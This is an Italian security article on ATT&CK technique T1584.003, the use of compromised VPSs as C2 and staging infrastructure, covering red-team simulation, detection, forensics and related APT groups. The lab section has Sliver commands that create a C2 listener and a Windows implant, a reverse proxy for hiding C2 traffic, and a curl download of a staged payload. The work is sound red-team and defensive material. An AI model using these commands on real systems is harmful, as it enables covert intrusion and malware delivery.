VPS Compromessi come Infrastruttura d'Attacco: Compromise Infrastructure – Virtual Private Server (T1584.003)

La simulazione di questa tecnica in un esercizio red team non mira a compromettere un VPS reale di terzi — sarebbe illegale — ma a riprodurre il flusso operativo che un avversario segue dopo aver ottenuto l'accesso a un server cloud, per poi usarlo come nodo C2 o staging area.

Scenario lab: crea un VPS nel tuo ambiente cloud di test (un'istanza su provider come DigitalOcean, Linode o AWS) e trattalo come se fosse stato compromesso. L'obiettivo è configurarlo come relay C2 e verificare se il blue team rileva il traffico.

Inizia con il provisioning di un listener C2 sul VPS simulato. Con Sliver (open source), puoi generare un listener HTTPS che mimetizza il traffico in quello di un servizio cloud legittimo:

sliver > https --lhost 0.0.0.0 --lport 443 --domain staging-cdn.example.com

Genera poi un implant che punta al VPS:

sliver > generate --http staging-cdn.example.com --os windows --arch amd64 --save /tmp/payload.exe

Per replicare lo scenario di Volt Typhoon, che utilizza VPS compromessi come proxy C2, configura un reverse proxy con Caddy (open source) o Nginx (open source) sul VPS, così che il traffico C2 venga instradato attraverso un servizio apparentemente legittimo. Un semplice reverse proxy con Caddy:

caddy reverse-proxy --from :443 --to :8443

Per simulare il pattern di Operation MidnightEclipse, dove i VPS venivano usati come storage per file malevoli, configura un file server temporaneo sul VPS lab:

python3 -m http.server 8080 --directory /tmp/staging/

Dall'host vittima simulato, verifica il download:

curl -o payload.bin http://:8080/payload.bin

Il valore dell'esercizio sta nel misurare la capacità del SOC di distinguere connessioni verso IP cloud legittimi da sessioni C2 nascoste. Al termine, documenta quali indicatori di rete (JA3 hash, certificati self-signed, pattern di beaconing) il blue team è riuscito a identificare e quali no. Strumenti come Wireshark (open source) e Zeek (open source) lato difensivo completano l'analisi del traffico generato.

La detection diretta del compromesso di un VPS è, per definizione, fuori portata: l'azione avviene su infrastruttura altrui. La strategia efficace è la detection indiretta, focalizzata sul momento in cui quel VPS compromesso entra in contatto con il perimetro aziendale — tipicamente come nodo C2 o punto di staging.

Il primo log source critico è il proxy web o il firewall perimetrale. Monitora connessioni in uscita verso IP appartenenti a range cloud noti (AWS, Azure, GCP, DigitalOcean, Linode, Vultr) che presentano pattern anomali. Un singolo host che stabilisce sessioni HTTPS regolari, con intervalli costanti (beaconing), verso un IP cloud mai visto prima nelle baseline aziendali merita attenzione. I feed di threat intelligence arricchiscono questo tipo di correlazione: piattaforme come MISP (open source) o Anomali ThreatStream (a pagamento) permettono di incrociare gli IP osservati con indicatori noti.

Il secondo pilastro è l'analisi dei certificati TLS. I VPS compromessi spesso presentano certificati self-signed o certificati Let's Encrypt emessi da poche ore. I log TLS raccolti da Zeek (open source) espongono il campo certificate issuer, la data di emissione e il JA3/JA3S fingerprint. Un alert su certificati con validità inferiore a 30 giorni associati a connessioni verso IP cloud può intercettare infrastruttura appena predisposta.

Per gli ambienti con EDR, verifica connessioni outbound generate da processi inusuali. In Microsoft Defender for Endpoint (a pagamento), una query KQL utile:

DeviceNetworkEvents | where RemoteIPType == "Public" | where RemoteIP matches regex "cloud-ip-ranges" | summarize count() by DeviceName, InitiatingProcessFileName, RemoteIP | where count_ > 50

La logica è cercare processi che generano molte connessioni verso lo stesso IP cloud. Adatta il regex ai range CIDR dei principali provider, scaricabili dalle loro pagine ufficiali di documentazione.

Infine, gli internet scan esterni con Shodan (freemium) o Censys (freemium) possono rivelare VPS con servizi che espongono fingerprint di framework C2 noti (Cobalt Strike, Sliver, Mythic). Integra questi scan nel ciclo settimanale di threat hunting: se un IP contattato dai tuoi endpoint compare con un servizio sospetto su Shodan, hai un indicatore ad alta confidenza.

Nell'analisi forense legata a VPS compromessi, gli artefatti chiave non risiedono sul server — a cui raramente avrai accesso — ma sugli endpoint vittima che hanno interagito con quella infrastruttura e nelle fonti OSINT esterne.

Parti dalle connessioni di rete registrate sull'endpoint. Su Windows, l'evento Sysmon EventID 3 (Network Connection) documenta ogni connessione in uscita con IP remoto, porta, processo sorgente e timestamp. Filtra per IP appartenenti a range di cloud provider e correla con l'orario degli eventi sospetti. Se Sysmon non era attivo, il log Microsoft-Windows-Windows Firewall With Advanced Security/Firewall (EventID 2004 per regole create, EventID 5156 nel Security log per connessioni autorizzate) può fornire frammenti utili.

Su Linux, i log di auditd con regole sulla syscall connect catturano le connessioni in uscita a livello kernel:

-a always,exit -F arch=b64 -S connect -k net_connect

Se questa regola era configurata, avrai nel log ogni tentativo di connessione con PID, UID e indirizzo remoto.

Per ricostruire il profilo del VPS compromesso senza accedervi, le fonti OSINT esterne sono essenziali. Il passive DNS — consultabile tramite servizi come VirusTotal (freemium) o RiskIQ/Microsoft Defender Threat Intelligence (a pagamento) — rivela quali domini hanno puntato a quell'IP nel tempo. Se l'IP del VPS ha ospitato un dominio registrato di recente, hai un indicatore di infrastruttura effimera. I Certificate Transparency logs, interrogabili tramite il servizio crt.sh (gratuito), mostrano quali certificati TLS sono stati emessi per domini ospitati su quell'IP.

Lo storico WHOIS — disponibile su piattaforme come DomainTools (a pagamento) — aiuta a determinare se il VPS apparteneva a un'organizzazione legittima poi compromessa, coerentemente con il modello della tecnica. Nel caso di Operation MidnightEclipse, dove i VPS servivano come storage per file malevoli, cerca sugli endpoint artefatti di download: la cache del browser, la directory dei file temporanei, e i log del proxy o del DNS locale possono rivelare l'URL di staging da cui è stato scaricato il payload. Su Windows, il file %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat conserva la cronologia di download di Edge e Internet Explorer, analizzabile con ESEDatabaseView (gratuito) di NirSoft.

Due gruppi APT con profili e obiettivi radicalmente diversi convergono su questa tecnica, un segnale che l'uso di VPS compromessi è una scelta infrastrutturale trasversale piuttosto che un marchio di fabbrica di una specifica scuola operativa.

Volt Typhoon (G1017) è un gruppo legato alla Repubblica Popolare Cinese con focus su infrastrutture critiche. Il suo utilizzo di VPS compromessi come proxy C2 si inserisce in una filosofia operativa nota come living off the land: minimizzare l'uso di malware custom, sfruttare strumenti e infrastrutture legittime per confondersi con il traffico ordinario. Per un analista TI, la presenza di traffico C2 verso VPS cloud associati a range IP residenziali o small-business è un indicatore coerente con il profilo di Volt Typhoon. Il gruppo predilige la persistenza silenziosa a lungo termine, quindi i VPS compromessi vengono mantenuti operativi per mesi.

Turla (G0010) rappresenta un caso particolarmente sofisticato: il gruppo ha riutilizzato l'infrastruttura VPS già compromessa da attori iraniani, creando un'operazione false flag a più strati. Questo approccio — compromettere l'infrastruttura di un altro attaccante — complica enormemente l'attribuzione e merita un posto centrale nei modelli analitici. Un analista che rileva un'infrastruttura C2 e la attribuisce direttamente al titolare dell'attività nota su quel VPS rischia di cadere nella trappola di un'attribuzione errata.

La campagna Operation MidnightEclipse (C0048), attiva tra marzo e aprile 2024, ha sfruttato la vulnerabilità zero-day CVE-2024-3400 nei dispositivi Palo Alto Networks PAN-OS. L'uso di VPS per ospitare file malevoli dimostra un pattern ricorrente: gli attori combinano un vettore di accesso iniziale ad alto impatto con infrastruttura compromessa per lo staging, riducendo la tracciabilità.

Il trend operativo è chiaro: i VPS compromessi offrono un rapporto costo-rischio eccellente per l'attaccante. A differenza dei domini acquistati direttamente, non lasciano tracce di registrazione riconducibili all'avversario. Il consiglio è integrare nel modello di threat intelligence il monitoraggio dei range IP dei principali cloud provider, correlando connessioni anomale con feed di indicatori noti e intelligence sulle TTP dei gruppi sopra descritti.

Framework MITRE ATT&CK v16 — Tecnica T1584.003, Campagna C0048 (Operation MidnightEclipse), Gruppi G1017 (Volt Typhoon) e G0010 (Turla), Mitigazione M1056. Tool di detection e analisi: Zeek, Sysmon, Shodan, Censys, MISP, VirusTotal, crt.sh. Integrato con conoscenza professionale per tool e procedure operative.